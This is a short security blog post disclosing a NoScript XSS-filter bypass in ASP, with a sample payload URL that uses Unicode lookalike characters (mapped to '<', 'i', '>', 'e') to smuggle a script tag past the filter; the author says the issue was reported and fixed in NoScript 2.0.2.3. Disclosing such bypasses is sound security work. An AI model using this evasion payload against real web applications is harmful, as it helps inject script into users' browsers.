Tag Archives: NoScript bypass in ASP

NoScript New Bypass Method by Unicode in ASP


NoScript v2.0.2.3 does not have this problem anymore. Thanks to its author. As I’d told Giorgio, all the problems will be reported to him first

Woohoo! You/We/They/or whatever! can still use unicode in some places!

NoScript cannot find out special unicode characters which mean something in ASP:


http://Example.com/VulnFile.asp?DangInput=%u2329scr%u0131pt%u232A%u212Fval(‘alert’%2b'(“NoScript Bypass in ASP!\\nBy Soroush Dalili”)’)%u2329/scr%u0131pt%u232A

In this example I selected the characters from: http://rishida.net/scripts/uniview/uniview.php . For instance:
%u2329 = <
%u0131 = i
%u232A = >
%u212F = e
From Microsoft point of view! Therefore, IE8 XSS prevention can detect this encoding and NoScript cannot detect it.